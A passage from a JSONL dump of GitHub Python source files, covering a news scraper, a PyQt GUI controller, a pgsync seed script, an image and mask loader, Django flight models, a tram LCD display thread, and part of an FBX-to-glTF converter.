\"print_url\"])\nurls_map_df.to_csv(f\"{target_dir}matangi_urls_map.csv\", encoding=\"utf-8\")\n\nprint_urls = urls_map_df[\"print_url\"].tolist()\nnews_raw = mtg.scrape_urls(print_urls, \"field__items\", speed_up=True)\n\nnews_info = []\nfor raw in news_raw:\n url = raw[0]\n if len(raw[1]) > 1:\n news = raw[1][1].text\n elif len(raw[1]) == 1:\n news = raw[1][0].text\n news_info.append([url, news])\n\nnews_df = pd.DataFrame(news_info, columns=[\"print_url\", \"news\"])\nnews_df = (news_df.merge(urls_map_df, how=\"left\", on=\"print_url\")\n .merge(urls_df, how=\"left\", \n left_on=\"original_url\", right_on=\"url\"))\nnews_df = news_df[[\"url\", \"date\", \"title\", \"news\", \"tag\"]]\nnews_df.to_csv(target_dir+\"matangi_news.csv\", encoding=\"utf-8\")","repo_name":"worldbank/pacific-observatory","sub_path":"scripts/scraping/matangi.py","file_name":"matangi.py","file_ext":"py","file_size_in_byte":2783,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"24882821181","text":"from gui.mainModel import MainModel\nfrom gui.mainView import Ui_MainWindow\nfrom functools import partial\n\n\n\nclass MainController:\n\n\tdef __init__(self, view: Ui_MainWindow,model:MainModel):\n\n\t\tself._view = view\n\t\tself._model = model\n\t\tself._connectView()\n\n\tdef _connectView(self):\n\t\tassert self._view is not None\n\t\t# Connect buttons\n\t\t# btn = self._view.mainWindow\n\t\tself._view.btnGenerateSample.clicked.connect(self.btnShowSampleClicked)\n\t\tself._view.btn_Font.clicked.connect(self.fontClicked)\n\t\tself._view.btn_Font_Color.clicked.connect(partial(self.colorChooseClicked,self._view.btn_SelectedColor_Font,'selectedFontColor'))\n\t\tself._view.btn_Background_Color.clicked.connect(partial(self.colorChooseClicked,self._view.btn_SelectedColor_Background,'selectedBgColor'))\n\t\tself._view.btn_Border_Color.clicked.connect(partial(self.colorChooseClicked,self._view.btn_SelectedColor_Border,'selectedBorderColor'))\n\t\tself._view.btn_Fill_Color.clicked.connect(partial(self.colorChooseClicked,self._view.btn_SelectedColor_Fill,'selectedFillColor'))\n\t\tself.btnShowSampleClicked()\n\n\tdef colorChooseClicked(self,who,field):\n\t\tcolor = self._view.colorDialog(getattr(self._view,field))\n\n\t\tif color.isValid():\n\t\t\tsetattr(self._view,field,color)\n\t\t\tself._view.showSelectedColor(who,color)\n\n\n\tdef fontClicked(self):\n\t\tfont,valid = self._view.fontDialog(self._view.selectedFont)\n\t\tif valid:\n\n\t\t\tself._view.selectedFont = font\n\t\t\tself._view.showSelectedFont(font.toString())\n\t\telse:\n\t\t\tself._view.showSelectedFont('Zvolený font nie je podporovaný')\n\n\tdef btnShowSampleClicked(self):\n\t\t\"\"\"MAKE SETTINGS FROM FIELDS AND SHOW SAMPLE\"\"\"\n\t\tsettings = self.makeSettings()\n\n\n\t\tsample,valid = self._model.makeSample(settings)\n\t\tif valid:\n\t\t\tself._view.showSample(sample)\n\t\telse:\n\t\t\t# print('laal')\n\t\t\tself._view.lb_ImageSample.setVisible(True)\n\t\t\tself._view.lb_ImageSample.setText(\"Veľkosť generovaného textu presahuje veľkosť rozlíšenia,znížte rozlíšenie/upravte font\")\n\n\tdef makeSettings(self):\n\t\treturn self._view.construct_setting()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Flashikez/Text_Generator","sub_path":"gui/mainController.py","file_name":"mainController.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"10027621820","text":"import click\nfrom schema import Answer, Category, PossibleAnswer, Question, RealAnswer\nfrom sqlalchemy.orm import sessionmaker\n\nfrom pgsync.base import pg_engine, subtransactions\nfrom pgsync.helper import teardown\nfrom pgsync.utils import config_loader, get_config\n\n\n@click.command()\n@click.option(\n \"--config\",\n \"-c\",\n help=\"Schema config\",\n type=click.Path(exists=True),\n)\ndef main(config):\n config: str = get_config(config)\n teardown(drop_db=False, config=config)\n document = next(config_loader(config))\n database: str = document.get(\"database\", document[\"index\"])\n with pg_engine(database) as engine:\n Session = sessionmaker(bind=engine, autoflush=True)\n session = Session()\n\n # Bootstrap\n categories = [\n Category(\n id=1,\n uid=\"c001\",\n text=\"Colours\",\n ),\n Category(\n id=2,\n uid=\"c002\",\n text=\"Weather\",\n ),\n ]\n with subtransactions(session):\n session.add_all(categories)\n\n questions = [\n Question(\n id=1,\n uid=\"q001\",\n category_id=1,\n category_uid=\"c001\",\n text=\"What is your favorite color?\",\n ),\n Question(\n id=2,\n uid=\"q002\",\n category_id=2,\n category_uid=\"c002\",\n text=\"Is it raining outside?\",\n ),\n ]\n with subtransactions(session):\n session.add_all(questions)\n\n answers = [\n Answer(id=1, uid=\"a001\", text=\"Red\"),\n Answer(id=2, uid=\"a002\", text=\"Yes\"),\n Answer(id=3, uid=\"a003\", text=\"Green\"),\n Answer(id=4, uid=\"a004\", text=\"No\"),\n ]\n with subtransactions(session):\n session.add_all(answers)\n\n possible_answers = [\n PossibleAnswer(\n question_id=1,\n question_uid=\"q001\",\n answer_id=1,\n answer_uid=\"a001\",\n ),\n PossibleAnswer(\n question_id=1,\n question_uid=\"q001\",\n answer_id=3,\n answer_uid=\"a003\",\n ),\n PossibleAnswer(\n question_id=2,\n question_uid=\"q002\",\n answer_id=2,\n answer_uid=\"a002\",\n ),\n PossibleAnswer(\n question_id=2,\n question_uid=\"q002\",\n answer_id=4,\n answer_uid=\"a004\",\n ),\n ]\n with subtransactions(session):\n session.add_all(possible_answers)\n\n real_answers = [\n RealAnswer(\n question_id=1,\n question_uid=\"q001\",\n answer_id=1,\n answer_uid=\"a001\",\n ),\n RealAnswer(\n question_id=2,\n question_uid=\"q002\",\n answer_id=4,\n answer_uid=\"a004\",\n ),\n ]\n with subtransactions(session):\n session.add_all(real_answers)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"toluaina/pgsync","sub_path":"examples/quiz/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":3244,"program_lang":"python","lang":"en","doc_type":"code","stars":958,"dataset":"github-code","pt":"45"} +{"seq_id":"10197390408","text":"import pandas as pd\nimport skimage.io as io\nimport tensorflow as tf\nfrom skimage.color import rgb2gray\nimport numpy as np\ndef load_image(image_name, path):\n image = io.imread(path + image_name)[:,:,:3]\n return image\n\ndef load_mask(mask_name, path):\n mask = tf.io.read_file(path + mask_name)\n mask = tf.io.decode_png(mask, channels=1)\n mask = tf.where(mask == 255, 1, 0)\n\n return mask\n\n#zo staat het in mijn folder\n#\\Vision\\code_eind_opdracht\\data\\Mask\\0.png\"\ndef get_list_of_mask_and_image(start, end, path=\"./data\"):\n path_meta_data = path + \"/metadata.csv\"\n df_meta_data = pd.read_csv(path_meta_data)\n df_meta_data = df_meta_data.drop([28])\n df_meta_data = df_meta_data.drop([22])\n df_meta_data = df_meta_data.drop([19])\n df_meta_data = df_meta_data.drop([14])\n df_meta_data = df_meta_data.drop([9])\n selection = df_meta_data[start:end + 1]\n image_list = []\n mask_list = []\n #name_list = []\n for row in selection.iterrows():\n try:\n image = load_image(row[1]['Image'], path + \"/Image/\")\n mask = load_mask(row[1]['Mask'], path + \"/Mask/\")\n except:\n print(\"error with \", row[1])\n image_list.append(image)\n mask_list.append(mask)\n #str = (row[1]['Image'] + row[1]['Mask'])\n #name_list.append(str)\n image = None\n mask = None\n list_all = [image_list, mask_list]\n return list_all\n\ndef load_single_image(image_number, path=\"./data\"):\n path_meta_data = path + \"/metadata.csv\"\n df_meta_data = pd.read_csv(path_meta_data)\n row = df_meta_data.loc[image_number]\n return load_image(row['Image'], path + \"/Image/\")\n\ndef load_single_mask(mask_number, path=\"./data\"):\n path_meta_data = path + \"/metadata.csv\"\n df_meta_data = pd.read_csv(path_meta_data)\n row = df_meta_data.loc[mask_number]\n return load_mask(row['Mask'], path + \"/Mask/\")\n","repo_name":"raubenravi/Vision","sub_path":"code_eind_opdracht/data_inladen.py","file_name":"data_inladen.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"11468767647","text":"from django.db import models\n\nfrom cities.models import City\n\n\nclass Airport(models.Model):\n code = models.PositiveIntegerField(unique=True,null=False, blank=False)\n description = models.CharField(max_length=100)\n city = models.ForeignKey(City, on_delete=models.SET_NULL, null=True, blank=True)\n city_description = models.CharField(max_length=100, blank=True)\n lat = models.FloatField(null=True)\n lng = models.FloatField(null=True)\n country_code = models.CharField(max_length=2, blank=True)\n state_code = models.CharField(max_length=2, blank=True)\n \n def __str__(self):\n return self.description\n\nclass Flight(models.Model):\n itin_id = models.PositiveBigIntegerField(null=False, blank=False)\n mkt_id = models.PositiveBigIntegerField(null=False, blank=False)\n quarter = models.PositiveIntegerField(null=False, blank=False)\n origin_airport = models.ForeignKey(Airport, to_field=\"code\", on_delete=models.CASCADE, related_name=\"origin_airport\")\n dest_airport = models.ForeignKey(Airport, to_field=\"code\", on_delete=models.CASCADE, related_name=\"destination_airport\")\n passengers = models.PositiveIntegerField(null=False, blank=False)\n distance = models.PositiveIntegerField(null=False, blank=False)\n\n def __str__(self):\n return str(self.itin_id)\n","repo_name":"Kamil-Dab/Tass","sub_path":"tass_project/flights/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"71030648775","text":"\"\"\"\nTraitement le l'affichage des horaires et des lignes de tram.\n\nLe module est adapté à un écran lcd 16x2 mais est compatible avec tout\nautre taille en apportant de légères modifications.\n\"\"\"\n\nfrom datetime import datetime, timedelta\nimport sys\nimport logging\nimport threading\nimport rpi_i2c_lcd\nimport shared_data\nimport lcd_animations as anim\n\nREFRESH_TIME = 1 # Rafraîchit l'écran toutes les secondes\nANIM_REFRESH_TIME = 0.35 # Pour l'animation\n\ndef minutes_left(arrival_time):\n \"\"\"Calcule des minutes restantes entre arrival_time et maintenant.\"\"\"\n return int(timedelta.total_seconds(arrival_time - datetime.now()) // 60)\n\n\n# A MODIFIER POUR ÉCRAN DIFFÉRENT\ndef display_header(display, station_name):\n \"\"\"Affichage nom de station et heure.\"\"\"\n display.display_string(\"{:10.10} {:%H:%M}\".format(\n station_name, datetime.now()), 1)\n\n\ndef display_one_tramway(display, info_list):\n \"\"\"Affichage temps restant pour un tram.\"\"\"\n display.display_string(\"{}:{:3}m\".format(\n info_list[0][0], info_list[0][1])\n + \" \" * 10, 2)\n\n\ndef display_two_tramways(display, info_list):\n \"\"\"Affichage temps restant pour deux trams.\"\"\"\n display.display_string(\"{}:{:3}m {}:{:3}m\".format(\n info_list[0][0], info_list[0][1],\n info_list[1][0], info_list[1][1]), 2)\n\n\nclass DisplayThr(threading.Thread):\n \"\"\"Thread du traitement de l'affichage des arrivées de tram.\n\n Attributs:\n display: LiquidCrystalI2C\n logger: objet de log\n shared: liste de données partagées\n stop_event: objet event pour signaler l'arrêt du script\n Argument en plus:\n i2c_addr: adresse du module i2c\n i2c_bus: bus i2c du rpi\n \"\"\"\n def __init__(self, shared, stop_event, i2c_addr, i2c_bus):\n threading.Thread.__init__(self)\n self.logger = logging.getLogger(__name__)\n self.shared = shared\n self.stop_event = stop_event\n try:\n self.display = rpi_i2c_lcd.LiquidCrystalI2C(i2c_addr, i2c_bus)\n except OSError:\n self.logger.exception('Unconnected device.', exc_info=False)\n self.stop_event.set()\n sys.exit()\n\n\n def run(self):\n local_list = []\n shared_list = self.shared.list\n filt_list = [] # Tableau de tuples (nom_de_ligne, minutes_restantes)\n\n idle_animation = anim.DinoAnimation(self.display)\n\n while True:\n # Copie des données partagées\n with self.shared.lock:\n shared_data.copy_list(shared_list, local_list)\n\n # Filtrage pour ne retenir que les horaires valides (valeurs\n # positives)\n i = 0\n for itr in local_list:\n min_left = minutes_left(itr.expected_arriv)\n\n if min_left >= 0:\n try:\n filt_list[i] = (itr.line_ref, min_left)\n except IndexError:\n filt_list.append((itr.line_ref, min_left))\n finally:\n i = i + 1\n try:\n # Nothing to disclose, idle\n if i == 0:\n # Frames drawned by iterator\n for _ in idle_animation:\n if self.stop_event.wait(timeout=ANIM_REFRESH_TIME):\n break\n\n else:\n # Tri de précaution, garantit stable\n filt_list.sort(key=lambda tram: tram[1])\n self.display.set_cursor_at(0)\n display_header(self.display, local_list[0].station)\n if i == 1:\n display_one_tramway(self.display, filt_list)\n else:\n display_two_tramways(self.display, filt_list)\n\n except OSError:\n self.logger.exception('Connection error. Abort.',\n exc_info=False)\n self.stop_event.set()\n break\n\n if self.stop_event.wait(timeout=REFRESH_TIME):\n break\n","repo_name":"Jzavrk/CTS-tram-stop-monitoring","sub_path":"lcd_display.py","file_name":"lcd_display.py","file_ext":"py","file_size_in_byte":4091,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"30455067559","text":"# ############################################\n# fbx to glTF2.0 converter\n# glTF spec : https://github.com/KhronosGroup/glTF/blob/master/specification/2.0\n# fbx version 2018.1.1\n# TODO: texture flipY?\n# http://github.com/pissang/\n# ############################################\nimport sys, struct, json, os.path, math, argparse\n\ntry:\n from FbxCommon import *\nexcept ImportError:\n import platform\n msg = 'You need to copy the content in compatible subfolder under /lib/python into your python install folder such as '\n if platform.system() == 'Windows' or platform.system() == 'Microsoft':\n msg += '\"Python33/Lib/site-packages\"'\n elif platform.system() == 'Linux':\n msg += '\"/usr/local/lib/python3.3/site-packages\"'\n elif platform.system() == 'Darwin':\n msg += '\"/Library/Frameworks/Python.framework/Versions/3.3/lib/python3.3/site-packages\"'\n msg += ' folder.'\n print(msg)\n sys.exit(1)\n\nlib_materials = []\n\nlib_images = []\nlib_samplers = []\nlib_textures = []\n\n# attributes, indices, anim_parameters will be merged in accessors\nlib_attributes_accessors = []\nlib_indices_accessors = []\nlib_animation_accessors = []\nlib_ibm_accessors = []\nlib_accessors = []\n\nlib_buffer_views = []\nlib_buffers = []\n\nlib_cameras = []\nlib_meshes = []\n\nlib_nodes = []\nlib_scenes = []\n\nlib_skins = []\n\nlib_animations = []\n\n# Only python 3 support bytearray ?\n# http://dabeaz.blogspot.jp/2010/01/few-useful-bytearray-tricks.html\nattributeBuffer = bytearray()\nindicesBuffer = bytearray()\ninvBindMatricesBuffer = bytearray()\nanimationBuffer = bytearray()\n\nGL_RGBA = 0x1908\n\nGL_BYTE = 5120\nGL_UNSIGNED_BYTE = 5121\nGL_SHORT = 5122\nGL_UNSIGNED_SHORT = 5123\nGL_UNSIGNED_INT = 5125\nGL_FLOAT = 5126\n\nGL_REPEAT = 0x2901\n\n\nGL_TEXTURE_2D = 0x0DE1\nGL_TEXTURE_CUBE_MAP = 0x8513\nGL_REPEAT = 0x2901\nGL_CLAMP_TO_EDGE = 0x812F\nGL_NEAREST = 0x2600\nGL_LINEAR = 0x2601\nGL_NEAREST_MIPMAP_NEAREST = 0x2700\nGL_LINEAR_MIPMAP_NEAREST = 0x2701\nGL_NEAREST_MIPMAP_LINEAR = 0x2702\nGL_LINEAR_MIPMAP_LINEAR = 0x2703\n\nGL_ARRAY_BUFFER = 0x8892\nGL_ELEMENT_ARRAY_BUFFER = 0x8893\n\n\nENV_QUANTIZE = False\nENV_FLIP_V = True\n\n_id = 0\ndef GetId():\n global _id\n _id = _id + 1\n return _id\n\ndef ListFromM4(m):\n return [m[0][0], m[0][1], m[0][2], m[0][3], m[1][0], m[1][1], m[1][2], m[1][3], m[2][0], m[2][1], m[2][2], m[2][3], m[3][0], m[3][1], m[3][2], m[3][3]]\n\ndef MatGetOpacity(pMaterial):\n lFactor = pMaterial.TransparencyFactor.Get()\n lColor = pMaterial.TransparentColor.Get()\n\n return 1.0 - lFactor * (lColor[0] + lColor[1] + lColor[2]) / 3;\n\n\ndef quantize(pList, pStride, pMin, pMax):\n lRange = range(pStride)\n lMultiplier = []\n lDivider = []\n # TODO dynamic precision? may lose info?\n lPrecision = 1e6\n for i in lRange:\n pMax[i] = math.ceil(pMax[i] * lPrecision) / lPrecision;\n pMin[i] = math.floor(pMin[i] * lPrecision) / lPrecision;\n if pMax[i] == pMin[i]:\n lMultiplier.append(0)\n lDivider.append(0)\n else:\n lDividerTmp = (pMax[i] - pMin[i]) / 65535;\n lDividerTmp = math.ceil(lDividerTmp * lPrecision) / lPrecision\n lDivider.append(lDividerTmp)\n lMultiplier.append(1 / lDividerTmp)\n\n lNewList = []\n for item in pList:\n if pStride == 1:\n lNewList.append(int((item - pMin[0]) * lMultiplier[0]))\n else:\n lNewItem = []\n for i in lRange:\n lNewItem.append(int((item[i] - pMin[i]) * lMultiplier[i]))\n lNewList.append(lNewItem)\n\n # TODO\n if pStride == 1:\n lDecodeMatrix = [\n lDivider[0], 0,\n pMin[0], 1\n ]\n elif pStride == 2:\n lDecodeMatrix = [\n lDivider[0], 0, 0,\n 0, lDivider[1], 0,\n pMin[0], pMin[1], 1\n ]\n elif pStride == 3:\n lDecodeMatrix = [\n lDivider[0], 0, 0, 0,\n 0, lDivider[1], 0, 0,\n 0, 0, lDivider[2], 0,\n pMin[0], pMin[1], pMin[2], 1\n ]\n elif pStride == 4:\n lDecodeMatrix = [\n lDivider[0], 0, 0, 0, 0,\n 0, lDivider[1], 0, 0, 0,\n 0, 0, lDivider[2], 0, 0,\n 0, 0, 0, lDivider[3], 0,\n pMin[0], pMin[1], pMin[2], pMin[3], 1\n ]\n\n return lNewList, lDecodeMatrix, pMin, pMax\n\n\ndef CreateAccessorBuffer(pList, pType, pStride, pMinMax=False, pQuantize=False):\n lGLTFAcessor = {}\n\n if pMinMax:\n if len(pList) > 0:\n if pStride == 1:\n lMin = [pList[0]]\n lMax = [pList[0]]\n elif pStride == 16:\n lMin = ListFromM4(pList[0])\n lMax = ListFromM4(pList[0])\n else:\n lMin = list(pList[0])[:pStride]\n lMax = list(pList[0])[:pStride]\n else:\n lMax = [0] * pStride\n lMin = [0] * pStride\n lRange = range(pStride)\n for item in pList:\n if pStride == 1:\n for i in lRange:\n lMin[i] = min(lMin[i], item)\n lMax[i] = max(lMax[i], item)\n else:\n if pStride == 16:\n item = ListFromM4(item)\n for i in lRange:\n lMin[i] = min(lMin[i], item[i])\n lMax[i] = max(lMax[i], item[i])\n\n if pQuantize and pType == 'f' and pStride <= 4:\n pList, lDecodeMatrix, lDecodedMin, lDecodedMax = quantize(pList, pStride, lMin[0:], lMax[0:])\n pType = 'H'\n # https://github.com/KhronosGroup/glTF/blob/master/extensions/Vendor/WEB3D_quantized_attributes\n lGLTFAcessor['extensions'] = {\n 'WEB3D_quantized_attributes': {\n 'decodedMin': lDecodedMin,\n 'decodedMax': lDecodedMax,\n 'decodeMatrix': lDecodeMatrix\n }\n }\n\n lPackType = '<' + pType * pStride\n lData = []\n #TODO: Other method to write binary buffer ?\n for item in pList:\n if pStride == 1:\n lData.append(struct.pack(lPackType, item))\n elif pStride == 2:\n lData.append(struct.pack(lPackType, item[0], item[1]))\n elif pStride == 3:\n lData.append(struct.pack(lPackType, item[0], item[1], item[2]))\n elif pStride == 4:\n lData.append(struct.pack(lPackType, item[0], item[1], item[2], item[3]))\n elif pStride == 16:\n m = item\n lData.append(struct.pack(lPackType, m[0][0], m[0][1], m[0][2], m[0][3], m[1][0], m[1][1], m[1][2], m[1][3], m[2][0], m[2][1], m[2][2], m[2][3], m[3][0], m[3][1], m[3][2], m[3][3]))\n\n if pType == 'f':\n lGLTFAcessor['componentType'] = GL_FLOAT\n # Unsigned Int\n elif pType == 'I':\n lGLTFAcessor['componentType'] = GL_UNSIGNED_INT\n\n # Unsigned Short\n elif pType == 'H':\n lGLTFAcessor['componentType'] = GL_UNSIGNED_SHORT\n\n if pStride == 1:\n lGLTFAcessor['type'] = 'SCALAR'\n elif pStride == 2:\n lGLTFAcessor['type'] = 'VEC2'\n elif pStride == 3:\n lGLTFAcessor['type'] = 'VEC3'\n elif pStride == 4:\n lGLTFAcessor['type'] = 'VEC4'\n elif pStride == 9:\n lGLTFAcessor['type'] = 'MAT3'\n elif pStride == 16:\n lGLTFAcessor['type'] = 'MAT4'\n\n lGLTFAcessor['byteOffset'] = 0\n lGLTFAcessor['count'] = len(pList)\n\n if pMinMax:\n lGLTFAcessor['max'] = lMax\n lGLTFAcessor['min'] = lMin\n\n return b''.join(lData), lGLTFAcessor\n\ndef appendToBuffer(pType, pBuffer, pData, pObj):\n lByteOffset = len(pBuffer)\n if pType == 'f' or pType == 'I':\n # should be a multiple of 4 for alignment\n if lByteOffset % 4 == 2:\n pBuffer.extend(b'\\x00\\x00')\n lByteOffset += 2\n\n pObj['byteOffset'] = lByteOffset\n pBuffer.extend(pData)\n\ndef CreateAttributeBuffer(pList, pType, pStride):\n lData, lGLTFAttribute = CreateAccessorBuffer(pList, pType, pStride, True, ENV_QUANTIZE)\n appendToBuffer(pType, attributeBuffer, lData, lGLTFAttribute)\n idx = len(lib_accessors)\n lib_attributes_accessors.append(lGLTFAttribute)\n lib_accessors.append(lGLTFAttribute)\n return idx\n\n\ndef CreateIndicesBuffer(pList, pType):\n # Sketchfab needs all accessor have min, max?\n lData, lGLTFIndices = CreateAccessorBuffer(pList, pType, 1, True)\n appendToBuffer(pType, indicesBuffer, lData, lGLTFIndices)\n idx = len(lib_accessors)\n lib_indices_accessors.append(lGLTFIndices)\n lib_accessors.append(lGLTFIndices)\n return idx\n\ndef CreateAnimationBuffer(pList, pType, pStride):\n lData, lGLTFAnimSampler = CreateAccessorBuffer(pList, pType, pStride, True)\n\n # PENDING\n # lAllSame = True\n # for i in range(pStride):\n # if lGLTFAnimSampler['min'][i] != lGLTFAnimSampler['max'][i]:\n # lAllSame = False\n # # Just ignore it.\n # if lAllSame:\n # return -1\n\n appendToBuffer(pType, animationBuffer, lData, lGLTFAnimSampler)\n\n idx = len(lib_accessors)\n lib_animation_accessors.append(lGLTFAnimSampler)\n lib_accessors.append(lGLTFAnimSampler)\n return idx\n\ndef CreateIBMBuffer(pList):\n lData, lGLTFIBM = CreateAccessorBuffer(pList, 'f', 16, True)\n appendToBuffer('f', invBindMatricesBuffer, lData, lGLTFIBM)\n idx = len(lib_accessors)\n lib_ibm_accessors.append(lGLTFIBM)\n lib_accessors.append(lGLTFIBM)\n return idx\n\n\ndef CreateImage(pPath):\n lImageIndices = [idx for idx in range(len(lib_images)) if lib_images[idx]['uri'] == pPath]\n if len(lImageIndices):\n return lImageIndices[0]\n\n lImageIdx = len(lib_images)\n lib_images.append({\n 'uri' : pPath\n })\n return lImageIdx\n\ndef HashSampler(pTexture):\n lHashStr = []\n # Wrap S\n lHashStr.append(str(pTexture.WrapModeU.Get()))\n # Wrap T\n lHashStr.append(str(pTexture.WrapModeV.Get()))\n return ' '.join(lHashStr)\n\ndef ConvertWrapMode(pWrap):\n if pWrap == FbxTexture.eRepeat:\n return GL_REPEAT\n elif pWrap == FbxTexture.eClamp:\n return GL_CLAMP_TO_EDGE\n\n_samplerHashMap = {}\ndef CreateSampler(pTexture):\n lHashKey = HashSampler(pTexture)\n if lHashKey in _samplerHashMap:\n return _samplerHashMap[lHashKey]\n else:\n lSamplerIdx = len(lib_samplers)\n lib_samplers.append({\n 'wrapS' : ConvertWrapMode(pTexture.WrapModeU.Get()),\n 'wrapT' : ConvertWrapMode(pTexture.WrapModeV.Get()),\n # Texture filter in fbx ?\n 'minFilter' : GL_LINEAR_MIPMAP_LINEAR,\n 'magFilter' : GL_LINEAR\n })\n _samplerHashMap[lHashKey] = lSamplerIdx\n return lSamplerIdx\n\n_textureHashMap = {}\ndef CreateTexture(pProperty):\n lTextureList = []\n\n lFileTextures = []\n lLayeredTextureCount = pProperty.GetSrcObjectCount(FbxCriteria.ObjectType(FbxLayeredTexture.ClassId))\n if lLayeredTextureCount > 0:\n for i in range(lLayeredTextureCount):\n lLayeredTexture = pProperty.GetSrcObject(FbxCriteria.ObjectType(FbxLayeredTexture.ClassId), i)\n for j in range(lLayeredTexture.GetSrcObjectCount(FbxCriteria.ObjectType(FbxTexture.ClassId))):\n lTexture = lLayeredTexture.GetSrcObject(FbxCriteria.ObjectType(FbxTexture.ClassId), j)\n if lTexture and lTexture.__class__ == FbxFileTexture:\n lFileTextures.append(lTexture)\n pass\n else:\n lTextureCount = pProperty.GetSrcObjectCount(FbxCriteria.ObjectType(FbxTexture.ClassId))\n for t in range(lTextureCount):\n lTexture = pProperty.GetSrcObject(FbxCriteria.ObjectType(FbxTexture.ClassId), t)\n if lTexture and lTexture.__class__ == FbxFileTexture:\n lFileTextures.append(lTexture)\n\n for lTexture in lFileTextures:\n try:\n lTextureFileName = lTexture.GetFileName()\n except UnicodeDecodeError:\n print('Get texture file name error.')\n continue\n lImageIdx = CreateImage(lTextureFileName)\n lSamplerIdx = CreateSampler(lTexture)\n lHashKey = (lImageIdx, lSamplerIdx)\n if lHashKey in _textureHashMap:\n lTextureList.append(_textureHashMap[lHashKey])\n else:\n lTextureIdx = len(lib_textures)\n lib_textures.append({\n 'format' : GL_RGBA,\n 'internalFormat' : GL_RGBA,\n 'sampler' : lSamplerIdx,\n 'source' : lImageIdx,\n 'target' : GL_TEXTURE_2D\n })\n _textureHashMap[lHashKey] = lTextureIdx\n lTextureList.append(lTextureIdx)\n # PENDING Return the first texture ?\n if len(lTextureList) > 0:\n return lTextureList[0]\n else:\n return None\n\ndef ConvertMaterial(pMaterial):\n lMaterialName = pMaterial.GetName()\n\n lGLTFMaterial = {\n \"name\" : lMaterialName,\n # TODO PBR\n \"extensions\": {\n \"KHR_materials_common\": {\n \"technique\": \"BLINN\",\n # Compatible with three.js loaders\n \"type\": \"commonBlinn\",\n \"values\": {}\n }\n }\n }\n lValues = lGLTFMaterial['extensions']['KHR_materials_common']['values']\n lShading = pMaterial.ShadingModel.Get()\n\n lMaterialIdx = len(lib_materials)\n if (lShading == 'unknown'):\n lib_materials.append(lGLTFMaterial)\n return lMaterialIdx\n\n lValues['ambient'] = list(pMaterial.Ambient.Get())\n lValues['emission'] = list(pMaterial.Emissive.Get())\n\n lTransparency = MatGetOpacity(pMaterial)\n if lTransparency < 1:\n lValues['transparency'] = lTransparency\n lValues['transparent'] = True\n\n # Use diffuse map\n # TODO Diffuse Factor ?\n if pMaterial.Diffuse.GetSrcObjectCount() > 0:\n lTextureIdx = CreateTexture(pMaterial.Diffuse)\n if not lTextureIdx == None:\n lValues['diffuse'] = lTextureIdx\n else:\n lValues['diffuse'] = list(pMaterial.Diffuse.Get())\n\n if pMaterial.Bump.GetSrcObjectCount() > 0:\n # TODO 3dsmax use the normal map as bump map ?\n lTextureIdx = CreateTexture(pMaterial.Bump)\n if not lTextureIdx == None:\n lGLTFMaterial['normalTexture'] = {\n \"index\": lTextureIdx\n }\n\n if pMaterial.NormalMap.GetSrcObjectCount() > 0:\n lTextureIdx = CreateTexture(pMaterial.NormalMap)\n if not lTextureIdx == None:\n lGLTFMaterial['normalTexture'] = {\n \"index\": lTextureIdx\n }\n # PENDING\n if lShading == 'phong' or lShading == 'Phong':\n lValues['shininess'] = pMaterial.Shininess.Get()\n # Use specular map\n # TODO Specular Factor ?\n if pMaterial.Specular.GetSrcObjectCount() > 0:\n pass\n else:\n lValues['specular'] = list(pMaterial.Specular.Get())\n\n lib_materials.append(lGLTFMaterial)\n return lMaterialIdx\n\ndef ConvertToPBRMaterial(pMaterial):\n lMaterialName = pMaterial.GetName()\n lShading = str(pMaterial.ShadingModel.Get()).lower()\n\n lGLTFMaterial = {\n \"name\" : lMaterialName,\n \"pbrMetallicRoughness\": {\n \"baseColorFactor\": [1, 1, 1, 1],\n \"metallicFactor\": 0,\n \"roughnessFactor\": 1\n }\n }\n lValues = lGLTFMaterial[\"pbrMetallicRoughness\"];\n\n lMaterialIdx = len(lib_materials)\n\n if (lShading == 'unknown'):\n lib_materials.append(lGLTFMaterial)\n return lMaterialIdx\n\n lGLTFMaterial['emissiveFactor'] = list(pMaterial.Emissive.Get())\n\n lTransparency = MatGetOpacity(pMaterial)\n if lTransparency < 1:\n lGLTFMaterial['alphaMode'] = 'BLEND'\n lValues['baseColorFactor'][3] = lTransparency\n\n # Use diffuse map\n # TODO Diffuse Factor ?\n if pMaterial.Diffuse.GetSrcObjectCount() > 0:\n lTextureIdx = CreateTexture(pMaterial.Diffuse)\n if not lTextureIdx == None:\n lValues['baseColorTexture'] = {\n \"index\": lTextureIdx,\n \"texCoord\": 0\n }\n else:\n lValues['baseColorFactor'][0:3] = list(pMaterial.Diffuse.Get())\n\n if pMaterial.Bump.GetSrcObjectCount() > 0:\n # TODO 3dsmax use the normal map as bump map ?\n lTextureIdx = CreateTexture(pMaterial.Bump)\n if not lTextureIdx == None:\n lGLTFMaterial['normalTexture'] = {\n \"index\": lTextureIdx,\n \"texCoord\": 0\n }\n\n if pMaterial.NormalMap.GetSrcObjectCount() > 0:\n lTextureIdx = CreateTexture(pMaterial.NormalMap)\n if not lTextureIdx == None:\n lGLTFMaterial['normalTexture'] = {\n \"index\": lTextureIdx,\n \"texCoord\": 0\n }\n # PENDING\n\n if lShading == 'phong':\n lGLossiness = math.log(pMaterial.Shininess.Get()) / math.log(8192)\n lValues['roughnessFactor'] = min(max(1 - lGLossiness, 0), 1)\n\n lib_materials.append(lGLTFMaterial)\n return lMaterialIdx\n\n\ndef ConvertVertexLayer(pMesh, pLayer, pOutput):\n lMappingMode = pLayer.GetMappingMode()\n lReferenceMode = pLayer.GetReferenceMode()\n\n if lMappingMode == FbxLayerElement.eByControlPoint:\n if lReferenceMode == FbxLayerElement.eDirect:\n for vec in pLayer.GetDirectArray():\n pOutput.append(vec)\n elif lReferenceMode == FbxLayerElement.eIndexToDirect:\n lIndexArray = 